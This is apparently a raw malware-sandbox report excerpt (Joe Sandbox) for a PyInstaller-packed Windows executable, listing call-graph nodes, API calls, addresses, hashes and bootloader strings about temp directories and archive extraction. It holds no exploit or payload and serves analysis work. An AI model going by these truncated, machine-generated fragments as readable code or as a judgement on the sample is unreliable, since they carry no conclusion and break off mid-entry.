7ff6dd668aa4 16337->16363 16366 7ff6dd658950 16337->16366 16342 7ff6dd657ac7 __vcrt_freefls 16339->16342 16346 7ff6dd658ae0 57 API calls 16342->16346 16358 7ff6dd657a7a __vcrt_freefls 16342->16358 16344 7ff6dd658ae0 57 API calls 16343->16344 16343->16358 16345 7ff6dd657a57 16344->16345 16347 7ff6dd657a5c 16345->16347 16348 7ff6dd657a99 SetEnvironmentVariableW 16345->16348 16349 7ff6dd657ae5 16346->16349 16350 7ff6dd658ae0 57 API calls 16347->16350 16348->16358 16351 7ff6dd657aea 16349->16351 16352 7ff6dd657b1d SetEnvironmentVariableW 16349->16352 16353 7ff6dd657a6c 16350->16353 16354 7ff6dd658ae0 57 API calls 16351->16354 16352->16358 16355 7ff6dd667dec 38 API calls 16353->16355 16355->16358 16358->16332 16360 7ff6dd652855 16359->16360 16417 7ff6dd664d18 16360->16417 16611 7ff6dd6686d0 16363->16611 16367 7ff6dd65bc60 16366->16367 16368 7ff6dd658960 GetCurrentProcess OpenProcessToken 16367->16368 16369 7ff6dd6589ab GetTokenInformation 16368->16369 16370 7ff6dd658a21 __vcrt_freefls 16368->16370 16371 7ff6dd6589cd GetLastError 16369->16371 16372 7ff6dd6589d8 16369->16372 16373 7ff6dd658a3a 16370->16373 16374 7ff6dd658a34 FindCloseChangeNotification 16370->16374 16371->16370 16371->16372 16372->16370 16375 7ff6dd6589ee GetTokenInformation 16372->16375 16742 7ff6dd658650 16373->16742 16374->16373 16375->16370 16377 7ff6dd658a14 ConvertSidToStringSidW 16375->16377 16377->16370 16384 7ff6dd65742c 16383->16384 16385 7ff6dd658ae0 57 API calls 16384->16385 16386 7ff6dd65744e 16385->16386 16387 7ff6dd657456 16386->16387 16388 7ff6dd657469 ExpandEnvironmentStringsW 16386->16388 16389 7ff6dd652b30 59 API calls 16387->16389 16390 7ff6dd65748f __vcrt_freefls 16388->16390 16396 7ff6dd657462 16389->16396 16391 7ff6dd6574a6 16390->16391 16392 7ff6dd657493 16390->16392 16397 7ff6dd6574b4 16391->16397 16398 7ff6dd6574c0 16391->16398 16394 7ff6dd652b30 59 API calls 16392->16394 16393 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16395 7ff6dd657588 16393->16395 16394->16396 16395->16358 
calls 19121->19122 19123 7ff6dd672648 19122->19123 19124 7ff6dd672666 19123->19124 19125 7ff6dd672654 GetOEMCP 19123->19125 19126 7ff6dd67266b GetACP 19124->19126 19127 7ff6dd67267b 19124->19127 19125->19127 19126->19127 19127->19088 19127->19104 19129 7ff6dd672634 47 API calls 19128->19129 19130 7ff6dd672d09 19129->19130 19131 7ff6dd672e5f 19130->19131 19132 7ff6dd672d46 IsValidCodePage 19130->19132 19138 7ff6dd672d60 memcpy_s 19130->19138 19133 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19131->19133 19132->19131 19134 7ff6dd672d57 19132->19134 19135 7ff6dd672aa1 19133->19135 19136 7ff6dd672d86 GetCPInfo 19134->19136 19134->19138 19135->19095 19135->19098 19136->19131 19136->19138 19155 7ff6dd67274c 19138->19155 19211 7ff6dd670cb8 EnterCriticalSection 19139->19211 19156 7ff6dd672789 GetCPInfo 19155->19156 19157 7ff6dd67287f 19155->19157 19156->19157 19158 7ff6dd67279c 19156->19158 19159 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19157->19159 19160 7ff6dd6734b0 48 API calls 19158->19160 19161 7ff6dd67291e 19159->19161 19162 7ff6dd672813 19160->19162 19161->19131 19166 7ff6dd678454 19162->19166 19165 7ff6dd678454 54 API calls 19165->19157 19167 7ff6dd664f98 45 API calls 19166->19167 19168 7ff6dd678479 19167->19168 19171 7ff6dd678120 19168->19171 19172 7ff6dd678161 19171->19172 19173 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19172->19173 19174 7ff6dd6781ab 19173->19174 19176 7ff6dd6782e1 19174->19176 19178 7ff6dd678429 19174->19178 19179 7ff6dd66dbbc _fread_nolock 12 API calls 19174->19179 19181 7ff6dd6781e3 19174->19181 19175 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19177 7ff6dd672846 19175->19177 19176->19178 19180 7ff6dd66af0c __free_lconv_num 11 API calls 19176->19180 19177->19165 19178->19175 19179->19181 19180->19178 19181->19176 19182 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19181->19182 19183 7ff6dd678256 19182->19183 19183->19176 19202 7ff6dd66f5a4 19183->19202 19186 7ff6dd6782f2 19188 7ff6dd66dbbc _fread_nolock 12 API calls 19186->19188 19190 
7ff6dd6783c4 19186->19190 19191 7ff6dd678310 19186->19191 19187 7ff6dd6782a1 19187->19176 19189 7ff6dd66f5a4 __crtLCMapStringW 6 API calls 19187->19189 19188->19191 19189->19176 19190->19176 19192 7ff6dd66af0c __free_lconv_num 11 API calls 19190->19192 19191->19176 19193 7ff6dd66f5a4 __crtLCMapStringW 6 API calls 19191->19193 19192->19176 19194 7ff6dd678390 19193->19194 19194->19190 19195 7ff6dd6783c6 19194->19195 19196 7ff6dd6783b0 19194->19196 19197 7ff6dd6704c8 WideCharToMultiByte 19195->19197 19198 7ff6dd6704c8 WideCharToMultiByte 19196->19198 19199 7ff6dd6783be 19197->19199 19198->19199 19199->19190 19200 7ff6dd6783de 19199->19200 19200->19176 19201 7ff6dd66af0c __free_lconv_num 11 API calls 19200->19201 19201->19176 19203 7ff6dd66f1d0 __crtLCMapStringW 5 API calls 19202->19203 19204 7ff6dd66f5e2 19203->19204 19206 7ff6dd66f5ea 19204->19206 19208 7ff6dd66f690 19204->19208 19206->19176 19206->19186 19206->19187 19207 7ff6dd66f653 LCMapStringW 19207->19206 19209 7ff6dd66f1d0 __crtLCMapStringW 5 API calls 19208->19209 19210 7ff6dd66f6be __crtLCMapStringW 19209->19210 19210->19207 19213 7ff6dd669a3d 19212->19213 19214 7ff6dd6698d9 19212->19214 19215 7ff6dd669a66 19213->19215 19216 7ff6dd66af0c __free_lconv_num 11 API calls 19213->19216 19214->19059 19217 7ff6dd66af0c __free_lconv_num 11 API calls 19215->19217 19216->19213 19217->19214 19219 7ff6dd676c19 19218->19219 19220 7ff6dd676c30 19218->19220 19221 7ff6dd6654c4 _findclose 11 API calls 19219->19221 19220->19219 19223 7ff6dd676c3e 19220->19223 19222 7ff6dd676c1e 19221->19222 19224 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 19222->19224 19225 7ff6dd676c29 19223->19225 19226 7ff6dd664f98 45 API calls 19223->19226 19224->19225 19225->18897 19226->19225 19228 7ff6dd664f98 45 API calls 19227->19228 19229 7ff6dd679849 19228->19229 19232 7ff6dd6794a0 19229->19232 19234 7ff6dd6794ee 19232->19234 19233 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 19235 7ff6dd677ad5 19233->19235 19237 7ff6dd679560 GetCPInfo 
19234->19237 19238 7ff6dd679575 19234->19238 19241 7ff6dd679579 19234->19241 19235->18897 19235->18921 19236 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19239 7ff6dd67960d 19236->19239 19237->19238 19237->19241 19238->19236 19238->19241 19240 7ff6dd66dbbc _fread_nolock 12 API calls 19239->19240 19239->19241 19242 7ff6dd679644 19239->19242 19240->19242 19241->19233 19242->19241 19243 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19242->19243 19244 7ff6dd6796b2 19243->19244 19245 7ff6dd679794 19244->19245 19246 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19244->19246 19245->19241 19247 7ff6dd66af0c __free_lconv_num 11 API calls 19245->19247 19248 7ff6dd6796d8 19246->19248 19247->19241 19248->19245 19249 7ff6dd66dbbc _fread_nolock 12 API calls 19248->19249 19250 7ff6dd679705 19248->19250 19249->19250 19250->19245 19251 7ff6dd66fc00 _fread_nolock MultiByteToWideChar 19250->19251 19252 7ff6dd67977c 19251->19252 19253 7ff6dd67979c 19252->19253 19254 7ff6dd679782 19252->19254 19261 7ff6dd66f428 19253->19261 19254->19245 19256 7ff6dd66af0c __free_lconv_num 11 API calls 19254->19256 19256->19245 19258 7ff6dd6797db 19258->19241 19260 7ff6dd66af0c __free_lconv_num 11 API calls 19258->19260 19259 7ff6dd66af0c __free_lconv_num 11 API calls 19259->19258 19260->19241 19262 7ff6dd66f1d0 __crtLCMapStringW 5 API calls 19261->19262 19263 7ff6dd66f466 19262->19263 19264 7ff6dd66f690 __crtLCMapStringW 5 API calls 19263->19264 19266 7ff6dd66f46e 19263->19266 19265 7ff6dd66f4d7 CompareStringW 19264->19265 19265->19266 19266->19258 19266->19259 19268 7ff6dd67852a HeapSize 19267->19268 19269 7ff6dd678511 19267->19269 19270 7ff6dd6654c4 _findclose 11 API calls 19269->19270 19271 7ff6dd678516 19270->19271 19272 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 19271->19272 19273 7ff6dd678521 19272->19273 19273->18926 19275 7ff6dd670edb 19274->19275 19276 7ff6dd670ed1 19274->19276 19278 7ff6dd670ee0 19275->19278 19284 7ff6dd670ee7 _findclose 19275->19284 19277 7ff6dd66dbbc 
_fread_nolock 12 API calls 19276->19277 19282 7ff6dd670ed9 19277->19282 19281 7ff6dd66af0c __free_lconv_num 11 API calls 19278->19281 19279 7ff6dd670eed 19283 7ff6dd6654c4 _findclose 11 API calls 19279->19283 19280 7ff6dd670f1a HeapReAlloc 19280->19282 19280->19284 19281->19282 19282->18930 19283->19282 19284->19279 19284->19280 19285 7ff6dd673c00 _findclose 2 API calls 19284->19285 19285->19284 19287 7ff6dd6697b5 19286->19287 19288 7ff6dd6697b1 19286->19288 19307 7ff6dd6730ac GetEnvironmentStringsW 19287->19307 19288->18969 19299 7ff6dd669b5c 19288->19299 19291 7ff6dd6697c2 19293 7ff6dd66af0c __free_lconv_num 11 API calls 19291->19293 19292 7ff6dd6697ce 19314 7ff6dd66991c 19292->19314 19293->19288 19296 7ff6dd66af0c __free_lconv_num 11 API calls 19297 7ff6dd6697f5 19296->19297 19298 7ff6dd66af0c __free_lconv_num 11 API calls 19297->19298 19298->19288 19300 7ff6dd669b7f 19299->19300 19305 7ff6dd669b96 19299->19305 19300->18969 19301 7ff6dd66f158 _findclose 11 API calls 19301->19305 19302 7ff6dd669c0a 19304 7ff6dd66af0c __free_lconv_num 11 API calls 19302->19304 19303 7ff6dd66fc00 MultiByteToWideChar _fread_nolock 19303->19305 19304->19300 19305->19300 19305->19301 19305->19302 19305->19303 19306 7ff6dd66af0c __free_lconv_num 11 API calls 19305->19306 19306->19305 19308 7ff6dd6697ba 19307->19308 19309 7ff6dd6730d0 19307->19309 19308->19291 19308->19292 19310 7ff6dd66dbbc _fread_nolock 12 API calls 19309->19310 19311 7ff6dd673107 memcpy_s 19310->19311 19312 7ff6dd66af0c __free_lconv_num 11 API calls 19311->19312 19313 7ff6dd673127 FreeEnvironmentStringsW 19312->19313 19313->19308 19315 7ff6dd669944 19314->19315 19316 7ff6dd66f158 _findclose 11 API calls 19315->19316 19328 7ff6dd66997f 19316->19328 19317 7ff6dd66af0c __free_lconv_num 11 API calls 19318 7ff6dd6697d6 19317->19318 19318->19296 19319 7ff6dd669a01 19320 7ff6dd66af0c __free_lconv_num 11 API calls 19319->19320 19320->19318 19321 7ff6dd66f158 _findclose 11 API calls 19321->19328 19322 7ff6dd6699f0 19323 
7ff6dd669a38 11 API calls 19322->19323 19325 7ff6dd6699f8 19323->19325 19324 7ff6dd670e54 _wfindfirst32i64 37 API calls 19324->19328 19326 7ff6dd66af0c __free_lconv_num 11 API calls 19325->19326 19330 7ff6dd669987 19326->19330 19327 7ff6dd669a24 19331 7ff6dd66aec4 _wfindfirst32i64 17 API calls 19327->19331 19328->19319 19328->19321 19328->19322 19328->19324 19328->19327 19329 7ff6dd66af0c __free_lconv_num 11 API calls 19328->19329 19328->19330 19329->19328 19330->19317 19332 7ff6dd669a36 19331->19332 19334 7ff6dd679409 __crtLCMapStringW 19333->19334 19335 7ff6dd66f428 6 API calls 19334->19335 19336 7ff6dd6779be 19334->19336 19335->19336 19336->18993 19336->18994 19340 7ff6dd65b143 19341 7ff6dd65b154 19340->19341 19342 7ff6dd65b212 19341->19342 19343 7ff6dd66af0c 11 API calls 19341->19343 19343->19342

                                                            Control-flow Graph

                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD6763B5
                                                              • Part of subcall function 00007FF6DD675D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D1C
                                                              • Part of subcall function 00007FF6DD66AF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                              • Part of subcall function 00007FF6DD66AF0C: GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                              • Part of subcall function 00007FF6DD66AEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6DD66AEA3,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66AECD
                                                              • Part of subcall function 00007FF6DD66AEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6DD66AEA3,?,?,?,?,?,00007FF6DD6630CC), ref: 00007FF6DD66AEF2
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD6763A4
                                                              • Part of subcall function 00007FF6DD675D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D7C
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67661A
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67662B
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67663C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DD67687C), ref: 00007FF6DD676663
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 1458651798-239921721
                                                            • Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                            • Instruction ID: 5dc811ae22314c14717850fe1a0a93d3530170a62a496e30514234b3658afc97
                                                            • Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                            • Instruction Fuzzy Hash: 2BD19D22E18286A6E760FF6598502BD6351EF44794F448137EA0DC7A96FF3CE4A1A7C0

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                            • Instruction ID: a2e13258e5c77627688f77421edc538dbf9ac3bb839545f71d27ce3dcca85e63
                                                            • Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                            • Instruction Fuzzy Hash: 42C1C332F24A85A5EB10DF68C4801AC3761FB49BA8F110236DE2E977D4EF38D466D380

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6DD65154F), ref: 00007FF6DD6579E7
                                                              • Part of subcall function 00007FF6DD657B60: GetEnvironmentVariableW.KERNEL32(00007FF6DD653A1F), ref: 00007FF6DD657B9A
                                                              • Part of subcall function 00007FF6DD657B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DD657BB7
                                                              • Part of subcall function 00007FF6DD667DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD667E05
                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6DD657AA1
                                                              • Part of subcall function 00007FF6DD652B30: MessageBoxW.USER32 ref: 00007FF6DD652C05
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                            • API String ID: 3752271684-1116378104
                                                            • Opcode ID: fd0d91a48e08b4ddcb6cebc8fec788b09d16c3cc41867d355545f02c3c8609b6
                                                            • Instruction ID: 675624e65a6a73dbec84a9cd8b9a594b037d38cf704bc2b37b857e7b3e4a6832
                                                            • Opcode Fuzzy Hash: fd0d91a48e08b4ddcb6cebc8fec788b09d16c3cc41867d355545f02c3c8609b6
                                                            • Instruction Fuzzy Hash: D2516B51F0D2C251EE14BA66A8152BE52919F89BC0F444433ED0ECBB97FE2CE465A6C0

                                                            Control-flow Graph

                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67661A
                                                              • Part of subcall function 00007FF6DD675D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D7C
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67662B
                                                              • Part of subcall function 00007FF6DD675D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D1C
                                                            • _get_daylight.LIBCMT ref: 00007FF6DD67663C
                                                              • Part of subcall function 00007FF6DD675D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DD675D4C
                                                              • Part of subcall function 00007FF6DD66AF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                              • Part of subcall function 00007FF6DD66AF0C: GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DD67687C), ref: 00007FF6DD676663
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 2248164782-239921721
                                                            APIs
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0

                                                            Control-flow Graph

                                                            Strings
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                            • API String ID: 2030045667-3833288071

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000100000001,00007FF6DD65414C,00007FF6DD657911,?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658990
                                                            • OpenProcessToken.ADVAPI32(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD6589A1
                                                            • GetTokenInformation.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD6589C3
                                                            • GetLastError.KERNEL32(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD6589CD
                                                            • GetTokenInformation.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A0A
                                                            • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DD658A1C
                                                            • FindCloseChangeNotification.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A34
                                                            • LocalFree.KERNEL32(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A66
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6DD658A8D
                                                            • CreateDirectoryW.KERNELBASE(?,00007FF6DD657D26,?,00007FF6DD651785), ref: 00007FF6DD658A9E
                                                            Strings
                                                            Similarity
                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$ChangeCloseCreateCurrentDirectoryErrorFindFreeLastLocalNotificationOpen
                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                            • API String ID: 2187719417-2855260032

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _fread_nolock$Message
                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                            • API String ID: 677216364-1384898525

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                            • String ID: CreateProcessW$Error creating child process!
                                                            • API String ID: 2895956056-3524285272

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF6DD653EC0: GetModuleFileNameW.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD653EF1
                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF6DD653BE9
                                                              • Part of subcall function 00007FF6DD657B60: GetEnvironmentVariableW.KERNEL32(00007FF6DD653A1F), ref: 00007FF6DD657B9A
                                                              • Part of subcall function 00007FF6DD657B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DD657BB7
                                                            Strings
                                                            Similarity
                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                            • API String ID: 2344891160-3602715111

                                                            Control-flow Graph

                                                            Strings
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                            • API String ID: 2030045667-1655038675

                                                            Control-flow Graph

                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6DD66F56A,?,?,-00000018,00007FF6DD66B317,?,?,?,00007FF6DD66B20E,?,?,?,00007FF6DD666452), ref: 00007FF6DD66F34C
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6DD66F56A,?,?,-00000018,00007FF6DD66B317,?,?,?,00007FF6DD66B20E,?,?,?,00007FF6DD666452), ref: 00007FF6DD66F358
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                            • Instruction ID: cdb013f7f82069f14b70162649c538c201c39c20df7fd9db00b4cfa70b723199
                                                            • Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                            • Instruction Fuzzy Hash: 52413362F19A8251FA15EFA6980017D2395BF45BA0F480537DD0DD7784FE3CE869A7C0

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                            • Instruction ID: a67850f9a032dde42fdcf079281b44b900bd065a938506347de54a9b0cc37ee4
                                                            • Opcode Fuzzy Hash: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                            • Instruction Fuzzy Hash: DFC1D232D0CBC692EB60BF5598002BD7B54EB90B80F5A4173DA4D87791EE7CE865A3C0

                                                            Control-flow Graph

                                                            APIs
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6DD66D50B), ref: 00007FF6DD66D63C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6DD66D50B), ref: 00007FF6DD66D6C7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode
                                                            • String ID:
                                                            • API String ID: 953036326-0
                                                            • Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
